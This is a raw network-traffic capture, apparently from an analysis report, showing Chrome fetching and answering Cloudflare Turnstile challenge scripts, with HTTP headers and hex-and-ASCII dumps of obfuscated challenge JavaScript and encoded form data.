                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          15192.168.2.449760104.18.95.414434944C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:42:36 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8e82bfcf1ab94363&lang=auto HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-11-25 15:42:37 UTC331INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:42:37 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 116859
                                                                                                                          Connection: close
                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e82bfe9cddc41e3-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-11-25 15:42:37 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 50 69 6b 62 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                                                                          Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.uPikb3={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"http
                                                                                                                          2024-11-25 15:42:37 UTC1369INData Raw: 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 69 6e 76 61 6c 69 64 5f 64 6f 6d 61 69 6e 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 64 6f 6d 61 69 6e 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 6e 6f 74 5f 65 6d 62 65 64 64 65 64 22 3a 22 54 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 6d 75 73 74 25 32 30 62 65 25 32 30 65 6d 62 65 64 64 65 64 25 32 30 69 6e 74 6f 25 32 30 61 25 32 30 70 61 72 65 6e 74 25 32
                                                                                                                          Data Ascii: act%20the%20Site%20Administrator%20if%20this%20problem%20persists.","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%2
                                                                                                                          2024-11-25 15:42:37 UTC1369INData Raw: 2c 66 5a 2c 67 30 2c 67 71 2c 67 72 2c 67 76 2c 67 77 2c 67 78 2c 67 45 2c 66 58 2c 66 59 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 30 33 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 31 37 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 33 31 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 34 37 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 32 34 29 29 2f 35 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 30 33 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 35 31 29 29 2f 37 2a 28 2d 70 61 72 73 65 49 6e
                                                                                                                          Data Ascii: ,fZ,g0,gq,gr,gv,gw,gx,gE,fX,fY){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1603))/1*(-parseInt(gI(517))/2)+-parseInt(gI(1631))/3*(-parseInt(gI(547))/4)+parseInt(gI(1324))/5*(-parseInt(gI(903))/6)+parseInt(gI(1451))/7*(-parseIn
                                                                                                                          2024-11-25 15:42:37 UTC1369INData Raw: 38 32 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 67 5a 28 31 30 36 36 29 2c 27 77 69 64 67 65 74 49 64 27 3a 65 4d 5b 67 5a 28 31 32 34 33 29 5d 5b 67 5a 28 36 30 31 29 5d 2c 27 65 76 65 6e 74 27 3a 65 5b 67 5a 28 31 34 36 30 29 5d 2c 27 63 66 43 68 6c 4f 75 74 27 3a 65 4d 5b 67 5a 28 31 32 34 33 29 5d 5b 67 5a 28 38 36 37 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 65 4d 5b 67 5a 28 31 32 34 33 29 5d 5b 67 5a 28 33 33 32 29 5d 2c 27 63 6f 64 65 27 3a 65 5b 67 5a 28 36 36 32 29 5d 2c 27 72 63 56 27 3a 65 4d 5b 67 5a 28 31 32 34 33 29 5d 5b 67 5a 28 36 34 32 29 5d 7d 2c 27 2a 27 29 29 3a 66 3d 67 5b 67 5a 28 31 31 32 32 29 5d 28 67 5a 28 31 36 31 39 29 2c 68 5b 67 5a 28 31 32 34 33 29 5d 5b 67 5a 28 31 33 32 39 29 5d 29 29 7d 2c 67 29 7d 2c 65 4d 5b 67 4a 28
                                                                                                                          Data Ascii: 82)]({'source':gZ(1066),'widgetId':eM[gZ(1243)][gZ(601)],'event':e[gZ(1460)],'cfChlOut':eM[gZ(1243)][gZ(867)],'cfChlOutS':eM[gZ(1243)][gZ(332)],'code':e[gZ(662)],'rcV':eM[gZ(1243)][gZ(642)]},'*')):f=g[gZ(1122)](gZ(1619),h[gZ(1243)][gZ(1329)]))},g)},eM[gJ(
                                                                                                                          2024-11-25 15:42:37 UTC1369INData Raw: 28 27 2b 27 2c 6b 5b 68 30 28 31 31 37 38 29 5d 29 2c 42 5b 68 30 28 34 39 30 29 5d 28 6b 5b 68 30 28 35 32 33 29 5d 28 27 76 5f 27 2b 65 4d 5b 68 30 28 31 32 34 33 29 5d 5b 68 30 28 31 34 38 35 29 5d 2c 27 3d 27 29 2b 46 29 7d 63 61 74 63 68 28 47 29 7b 7d 7d 2c 65 4d 5b 67 4a 28 31 30 33 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 68 31 2c 65 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 69 66 28 68 31 3d 67 4a 2c 65 3d 7b 27 61 4f 6b 46 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 3d 3d 6e 7d 2c 27 78 61 4c 4a 43 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3d 3d 3d 6f 7d 2c 27 6c 4c 66 6d 57 27 3a 68 31 28 31 34 32 31 29 2c 27 73 70 4f 49 71 27 3a 68 31 28 31 37 30 33 29 2c 27 53 49
                                                                                                                          Data Ascii: ('+',k[h0(1178)]),B[h0(490)](k[h0(523)]('v_'+eM[h0(1243)][h0(1485)],'=')+F)}catch(G){}},eM[gJ(1035)]=function(d,h1,e,f,g,h,i,j,k,l,m){if(h1=gJ,e={'aOkFL':function(n,o){return o===n},'xaLJC':function(n,o){return n===o},'lLfmW':h1(1421),'spOIq':h1(1703),'SI
                                                                                                                          2024-11-25 15:42:37 UTC1369INData Raw: 31 65 33 29 2c 65 4d 5b 68 33 28 38 39 34 29 5d 5b 68 33 28 31 34 31 36 29 5d 28 6c 5b 68 33 28 34 31 37 29 5d 2c 66 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 43 3d 66 5b 68 33 28 34 36 35 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 72 65 74 75 72 6e 21 5b 5d 7d 62 72 65 61 6b 7d 7d 2c 65 55 3d 30 2c 65 58 3d 7b 7d 2c 65 58 5b 67 4a 28 39 32 32 29 5d 3d 65 57 2c 65 4d 5b 67 4a 28 37 30 39 29 5d 3d 65 58 2c 65 5a 3d 65 4d 5b 67 4a 28 31 32 34 33 29 5d 5b 67 4a 28 34 34 39 29 5d 5b 67 4a 28 31 30 33 31 29 5d 2c 66 30 3d 65 4d 5b 67 4a 28 31 32 34 33 29 5d 5b 67 4a 28 34 34 39 29 5d 5b 67 4a 28 33 36 36 29 5d 2c 66 31 3d 65 4d 5b 67 4a 28 31 32 34 33 29 5d 5b 67 4a 28 34 34 39 29 5d 5b 67 4a 28 35 32 36 29 5d 2c 66 64
                                                                                                                          Data Ascii: 1e3),eM[h3(894)][h3(1416)](l[h3(417)],f));continue;case'3':C=f[h3(465)]();continue;case'4':return![]}break}},eU=0,eX={},eX[gJ(922)]=eW,eM[gJ(709)]=eX,eZ=eM[gJ(1243)][gJ(449)][gJ(1031)],f0=eM[gJ(1243)][gJ(449)][gJ(366)],f1=eM[gJ(1243)][gJ(449)][gJ(526)],fd
                                                                                                                          2024-11-25 15:42:37 UTC1369INData Raw: 5d 3d 66 73 2c 66 57 5b 67 4a 28 31 33 30 37 29 5d 3d 66 72 2c 66 57 5b 67 4a 28 31 32 33 34 29 5d 3d 66 43 2c 66 57 5b 67 4a 28 31 35 36 38 29 5d 3d 66 42 2c 66 57 5b 67 4a 28 31 32 36 37 29 5d 3d 66 41 2c 66 57 5b 67 4a 28 33 35 30 29 5d 3d 66 7a 2c 66 57 5b 67 4a 28 35 34 34 29 5d 3d 66 6b 2c 66 57 5b 67 4a 28 36 33 30 29 5d 3d 66 56 2c 66 57 5b 67 4a 28 31 30 39 38 29 5d 3d 66 6f 2c 66 57 5b 67 4a 28 37 39 34 29 5d 3d 66 6c 2c 66 57 5b 67 4a 28 37 32 32 29 5d 3d 66 68 2c 66 57 5b 67 4a 28 31 32 36 33 29 5d 3d 66 67 2c 65 4d 5b 67 4a 28 31 30 36 32 29 5d 3d 66 57 2c 66 58 3d 5b 5d 2c 66 59 3d 30 3b 32 35 36 3e 66 59 3b 66 58 5b 66 59 5d 3d 53 74 72 69 6e 67 5b 67 4a 28 31 36 36 39 29 5d 28 66 59 29 2c 66 59 2b 2b 29 3b 66 5a 3d 28 30 2c 65 76 61 6c 29
                                                                                                                          Data Ascii: ]=fs,fW[gJ(1307)]=fr,fW[gJ(1234)]=fC,fW[gJ(1568)]=fB,fW[gJ(1267)]=fA,fW[gJ(350)]=fz,fW[gJ(544)]=fk,fW[gJ(630)]=fV,fW[gJ(1098)]=fo,fW[gJ(794)]=fl,fW[gJ(722)]=fh,fW[gJ(1263)]=fg,eM[gJ(1062)]=fW,fX=[],fY=0;256>fY;fX[fY]=String[gJ(1669)](fY),fY++);fZ=(0,eval)
                                                                                                                          2024-11-25 15:42:37 UTC1369INData Raw: 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 4a 3d 43 5b 6a 35 28 31 32 34 33 29 5d 5b 6a 35 28 35 31 35 29 5d 5b 6a 35 28 31 31 33 31 29 5d 28 6a 35 28 36 31 33 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 73 5b 6a 35 28 31 30 36 32 29 5d 5b 6a 35 28 31 32 33 34 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 36 27 3a 46 26 26 78 28 42 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 37 27 3a 4a 26 26 4a 5b 6a 35 28 31 37 34 32 29 5d 5b 6a 35 28 37 38 33 29 5d 28 4a 29 3b 63 6f 6e 74 69 6e 75 65 7d 62 72 65 61 6b 7d 7d 65 6c 73 65 20 46 3d 27 73 27 3d 3d 3d 45 26 26 21 67 5b 6a 35 28 31 30 35 38 29 5d 28 68 5b 44 5d 29 2c 6f 5b 6a 35 28 37 30 34 29 5d 28 6a 35 28 36 37 35 29 2c 6f 5b 6a 35 28 36 39 34 29 5d 28 69 2c 44 29
                                                                                                                          Data Ascii: ;continue;case'4':J=C[j5(1243)][j5(515)][j5(1131)](j5(613));continue;case'5':s[j5(1062)][j5(1234)]();continue;case'6':F&&x(B);continue;case'7':J&&J[j5(1742)][j5(783)](J);continue}break}}else F='s'===E&&!g[j5(1058)](h[D]),o[j5(704)](j5(675),o[j5(694)](i,D)
                                                                                                                          2024-11-25 15:42:37 UTC1369INData Raw: 61 47 64 4c 78 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 49 45 70 71 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 73 41 73 56 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 57 49 71 72 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 4a 70 61 43 72 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 45 51 4d 57 43 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 4c 53 4f 53 52 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 75 46 5a 75 58 27 3a 66 75 6e 63 74 69
                                                                                                                          Data Ascii: aGdLx':function(h,i){return h(i)},'IEpqS':function(h,i){return i|h},'sAsVJ':function(h,i){return h-i},'WIqrS':function(h,i){return i==h},'JpaCr':function(h,i){return h<i},'EQMWC':function(h,i){return i==h},'LSOSR':function(h,i){return h(i)},'uFZuX':functi
                                                                                                                          2024-11-25 15:42:37 UTC1369INData Raw: 27 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 6a 61 29 7b 69 66 28 6a 61 3d 6a 39 2c 6a 61 28 31 33 39 37 29 3d 3d 3d 6a 61 28 31 30 38 34 29 29 65 28 66 2c 30 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 68 3f 27 27 3a 66 2e 67 28 68 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 6a 2c 6a 62 29 7b 72 65 74 75 72 6e 20 6a 62 3d 6a 61 2c 6a 62 28 31 31 31 37 29 5b 6a 62 28 31 33 35 39 29 5d 28 6a 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 6a 64 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 52 2c 4c 2c 4d 2c 50 2c 51 2c 4e 29 7b 69 66 28 6a 64 3d 6a 39 2c 73 3d 7b 27 6b 49 6a 7a 66 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 6a 63 29 7b 72 65 74 75 72 6e 20 6a 63 3d 62 2c 64 5b 6a 63 28 31 36 39 34 29
                                                                                                                          Data Ascii: 'h':function(h,ja){if(ja=j9,ja(1397)===ja(1084))e(f,0);else return null==h?'':f.g(h,6,function(j,jb){return jb=ja,jb(1117)[jb(1359)](j)})},'g':function(i,j,o,jd,s,x,B,C,D,E,F,G,H,I,J,K,R,L,M,P,Q,N){if(jd=j9,s={'kIjzf':function(O,jc){return jc=b,d[jc(1694)


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          16192.168.2.449763104.18.94.414434944C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:42:36 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/8483636:1732548334:qatzfLsdWnn2uID_O6ulEbg-8PKAVWoVLs9erdHCWOA/8e82bfcf1ab94363/hwCBjRMZRBug6QUHIo8pkoJHB0bg199dhoOmFBOknk4-1732549352-1.1.1.1-W02dE4SJg1LEqxYn._MVvE_JDplRpnbMbGpKdagnp3aiY4qmIMS7S1mKMY.sC0_n HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Content-Length: 3075
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          Content-type: application/x-www-form-urlencoded
                                                                                                                          CF-Chl-RetryAttempt: 0
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          CF-Challenge: hwCBjRMZRBug6QUHIo8pkoJHB0bg199dhoOmFBOknk4-1732549352-1.1.1.1-W02dE4SJg1LEqxYn._MVvE_JDplRpnbMbGpKdagnp3aiY4qmIMS7S1mKMY.sC0_n
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Origin: https://challenges.cloudflare.com
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/qgqz3/0x4AAAAAAAz5HcczQ_Y58zGl/auto/fbE/normal/auto/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-11-25 15:42:36 UTC3075OUTData Raw: 76 5f 38 65 38 32 62 66 63 66 31 61 62 39 34 33 36 33 3d 38 2d 36 25 32 62 59 2b 57 44 4b 55 6c 43 36 65 2d 4e 48 57 37 4d 37 52 37 56 2b 4e 64 37 2d 50 39 57 6c 52 50 37 48 79 37 4b 50 37 42 41 77 37 67 61 67 37 48 62 7a 4e 6c 66 37 55 67 70 79 62 4e 37 77 7a 37 34 4e 4b 73 37 74 64 6c 55 62 76 2b 51 37 37 67 37 48 2d 33 37 49 2b 65 77 50 6a 37 65 64 37 30 47 2b 50 31 32 6c 2b 64 66 77 62 67 70 61 41 36 6c 68 45 37 66 33 36 45 37 6c 7a 36 37 35 68 73 77 4f 47 42 49 56 62 24 64 45 31 52 37 6c 49 37 48 43 37 45 6e 2d 30 33 2b 37 35 37 50 4f 37 51 45 61 42 51 66 57 44 68 4d 33 38 76 55 77 42 38 76 51 77 4d 4d 64 2d 4c 51 37 45 77 37 6a 4e 43 48 65 52 37 48 50 45 4d 4e 37 75 37 65 57 37 6f 4e 37 68 68 45 79 4e 32 65 51 5a 46 5a 6d 52 37 37 78 47 34 35 6d 37
                                                                                                                          Data Ascii: v_8e82bfcf1ab94363=8-6%2bY+WDKUlC6e-NHW7M7R7V+Nd7-P9WlRP7Hy7KP7BAw7gag7HbzNlf7UgpybN7wz74NKs7tdlUbv+Q77g7H-37I+ewPj7ed70G+P12l+dfwbgpaA6lhE7f36E7lz675hswOGBIVb$dE1R7lI7HC7En-03+757PO7QEaBQfWDhM38vUwB8vQwMMd-LQ7Ew7jNCHeR7HPEMN7u7eW7oN7hhEyN2eQZFZmR77xG45m7
                                                                                                                          2024-11-25 15:42:37 UTC747INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:42:37 GMT
                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                          Content-Length: 149792
                                                                                                                          Connection: close
                                                                                                                          cf-chl-gen: Pld3K2TJQVCX/FeR9LuOiXPh6vT7wZXO1DbjPu80eBGgRRvS6Uw45PpGRgmLzGu7ryywaZhbIKlSZshfYJa6xSYZo+iGs/gudIGGEIZ5iGieXEgn8Q4KACelcVl1BiYl0kHPlECj+lw/uvWKr0wLxSvkmvmjsnAyANaBWkB2b+5zIutJybmQHobypZOiWUguw+QmPFXhEU6fCU1vN78npp0SgAP5H591OO0ec+mTFE8zuPXERrH+Lg1uN4cZUbK7coEqY/MDPwp7bXUqHojpgivAuucpAFZgCRcR0luYw8UyggmLQwdbK4oCFGaFUV0K7ks6JYAApNXQN43JojyK3XY2jdRR3FRnTxfVeyn93kovJwZp65ZtrUiItPdUzz2bWQkiZsxx6Pk1FfBTBGg8R701XGU6mSGreX8nRfnTvA6iG05DUkYObArKYjIrZR08U3yCXvwNNwi2sJ8hz/9xnCjYLDaSkoV1tG1ArF0aZf9wTSk=$muKgR199xDGQUjLJ
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e82bfe9df84de92-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-11-25 15:42:37 UTC622INData Raw: 52 55 69 48 56 49 68 59 67 59 70 6a 68 47 4b 53 55 59 57 59 61 6e 57 4e 6d 6f 56 39 65 35 5a 36 6b 6d 2b 42 65 49 4f 6a 63 6f 4e 6a 67 4a 53 46 6f 35 32 74 6a 4c 4a 37 71 36 79 6e 63 71 4f 4b 71 62 61 45 70 6f 6c 39 76 61 43 35 6b 35 32 7a 74 71 50 46 6f 73 71 54 77 37 37 47 6f 4c 75 6b 79 73 36 30 76 71 48 41 31 63 76 51 77 73 65 75 30 37 37 58 7a 39 61 30 77 62 7a 45 72 37 4b 38 75 71 6a 6a 79 74 2b 73 35 38 37 69 30 75 65 78 35 65 37 56 35 39 6a 43 73 64 44 4c 36 4d 37 4d 39 4c 33 30 2b 4f 54 4f 77 64 7a 58 78 76 50 65 2f 63 76 33 34 67 4c 7a 33 52 4c 31 37 2b 50 77 41 78 50 6b 2b 50 44 6d 44 67 38 50 46 64 2f 37 44 2f 4d 41 49 65 66 32 46 43 30 6d 46 79 6a 71 4c 51 55 6f 4a 43 38 66 4f 51 63 6e 43 7a 77 7a 50 43 72 39 46 30 50 34 44 7a 77 58 4f 44 73
                                                                                                                          Data Ascii: RUiHVIhYgYpjhGKSUYWYanWNmoV9e5Z6km+BeIOjcoNjgJSFo52tjLJ7q6yncqOKqbaEpol9vaC5k52ztqPFosqTw77GoLukys60vqHA1cvQwseu077Xz9a0wbzEr7K8uqjjyt+s587i0uex5e7V59jCsdDL6M7M9L30+OTOwdzXxvPe/cv34gLz3RL17+PwAxPk+PDmDg8PFd/7D/MAIef2FC0mFyjqLQUoJC8fOQcnCzwzPCr9F0P4DzwXODs
                                                                                                                          2024-11-25 15:42:37 UTC1369INData Raw: 63 35 57 7a 4d 73 4e 6b 4a 59 56 53 38 32 4d 6b 51 2b 50 47 4e 56 51 32 4a 43 58 53 74 6a 61 30 4e 4f 63 6b 70 47 5a 45 56 54 4e 6d 68 4f 65 47 32 41 66 56 39 64 52 59 68 70 63 6c 4e 6c 69 58 71 4d 5a 48 35 70 62 33 36 49 52 33 64 68 56 59 57 56 65 6f 65 4b 63 4a 4e 2b 65 70 56 68 59 4b 5a 67 70 61 56 2f 71 4b 61 73 66 35 32 48 62 59 74 6b 72 62 57 69 67 6f 4a 79 6a 6f 4f 79 71 49 75 79 63 5a 43 33 74 72 6d 57 66 72 36 61 73 4d 4f 6a 77 4a 66 41 7a 70 37 50 77 73 4b 71 30 35 32 76 78 4c 62 49 73 72 6e 54 33 4b 36 62 6f 4c 44 4b 6e 36 32 2b 32 4c 6d 32 6e 39 33 68 77 4b 50 74 77 4b 76 47 34 65 76 66 79 65 57 30 79 63 33 70 75 4c 6a 52 37 62 7a 33 31 66 48 42 35 64 6e 31 78 63 54 64 2b 63 6b 45 34 66 33 58 38 65 55 43 32 2b 58 70 42 74 2f 55 37 51 72 6a 44
                                                                                                                          Data Ascii: c5WzMsNkJYVS82MkQ+PGNVQ2JCXStja0NOckpGZEVTNmhOeG2AfV9dRYhpclNliXqMZH5pb36IR3dhVYWVeoeKcJN+epVhYKZgpaV/qKasf52HbYtkrbWigoJyjoOyqIuycZC3trmWfr6asMOjwJfAzp7PwsKq052vxLbIsrnT3K6boLDKn62+2Lm2n93hwKPtwKvG4evfyeW0yc3puLjR7bz31fHB5dn1xcTd+ckE4f3X8eUC2+XpBt/U7QrjD
                                                                                                                          2024-11-25 15:42:37 UTC1369INData Raw: 2f 50 6b 4d 66 4e 6a 6b 6d 56 47 68 47 4c 57 41 38 58 47 39 64 56 54 52 42 56 32 41 33 56 55 74 55 53 31 6c 50 57 45 74 64 55 31 78 62 59 56 64 67 57 58 56 32 65 45 75 48 66 58 68 75 62 6c 4a 77 53 35 56 72 6d 58 69 54 5a 4a 5a 32 6d 34 35 38 61 6c 69 4f 62 32 39 63 6f 6c 35 7a 59 4b 61 70 64 32 53 72 6e 58 74 6f 72 34 74 2f 62 4c 4f 31 67 33 43 34 71 59 64 30 76 4a 57 51 69 70 71 64 6f 34 57 69 6b 71 69 4b 6c 61 71 73 7a 71 48 45 73 4e 50 55 70 4e 4b 76 7a 63 2b 57 78 36 2b 61 72 61 66 64 74 4b 76 4c 77 72 54 62 76 72 4c 43 35 36 57 37 33 39 72 42 35 4f 2f 78 73 4d 54 54 37 72 4b 30 35 37 66 73 74 75 6a 50 78 76 62 57 2b 2f 79 35 76 63 37 37 34 66 45 46 39 77 33 72 43 74 59 43 79 42 4c 74 34 42 58 64 38 65 55 49 31 41 6e 78 44 51 67 4d 37 2b 6f 43 2b 2f
                                                                                                                          Data Ascii: /PkMfNjkmVGhGLWA8XG9dVTRBV2A3VUtUS1lPWEtdU1xbYVdgWXV2eEuHfXhublJwS5VrmXiTZJZ2m458aliOb29col5zYKapd2SrnXtor4t/bLO1g3C4qYd0vJWQipqdo4WikqiKlaqszqHEsNPUpNKvzc+Wx6+arafdtKvLwrTbvrLC56W739rB5O/xsMTT7rK057fstujPxvbW+/y5vc774fEF9w3rCtYCyBLt4BXd8eUI1AnxDQgM7+oC+/
                                                                                                                          2024-11-25 15:42:37 UTC1369INData Raw: 4f 30 51 33 53 54 39 49 52 30 31 44 54 45 56 68 59 6d 51 33 63 32 6c 6b 57 6c 6f 2b 58 44 65 42 56 30 4e 54 52 49 4b 46 59 34 65 4b 5a 46 5a 45 65 6c 74 62 53 49 35 4b 58 30 79 53 6c 57 4e 51 6c 33 56 50 6a 6c 5a 78 61 33 71 42 6d 5a 53 6c 63 57 52 35 6c 4b 65 6d 6d 4a 32 77 66 71 53 77 62 49 32 32 6b 70 69 74 73 47 79 6d 64 59 36 57 6e 6e 6d 53 6d 4a 6c 2f 77 5a 4b 62 73 4d 43 59 6f 63 65 49 77 4a 2b 4e 7a 38 79 2f 73 70 36 53 6f 39 61 68 71 61 32 35 71 4b 62 54 79 64 48 68 34 36 43 74 30 4f 50 53 31 4e 72 73 75 75 6a 73 71 4c 6e 79 78 64 37 6f 34 4f 44 57 32 4d 72 6c 78 74 69 34 76 4f 2f 51 33 51 4c 37 39 75 33 6a 41 74 6a 39 39 64 6b 45 2b 65 41 46 42 65 6f 45 44 42 51 55 43 64 54 52 42 50 48 61 39 64 72 70 41 41 76 77 2f 66 50 38 37 77 4c 33 41 66 30
                                                                                                                          Data Ascii: O0Q3ST9IR01DTEVhYmQ3c2lkWlo+XDeBV0NTRIKFY4eKZFZEeltbSI5KX0ySlWNQl3VPjlZxa3qBmZSlcWR5lKemmJ2wfqSwbI22kpitsGymdY6WnnmSmJl/wZKbsMCYoceIwJ+Nz8y/sp6So9ahqa25qKbTydHh46Ct0OPS1NrsuujsqLnyxd7o4ODW2Mrlxti4vO/Q3QL79u3jAtj99dkE+eAFBeoEDBQUCdTRBPHa9drpAAvw/fP87wL3Af0
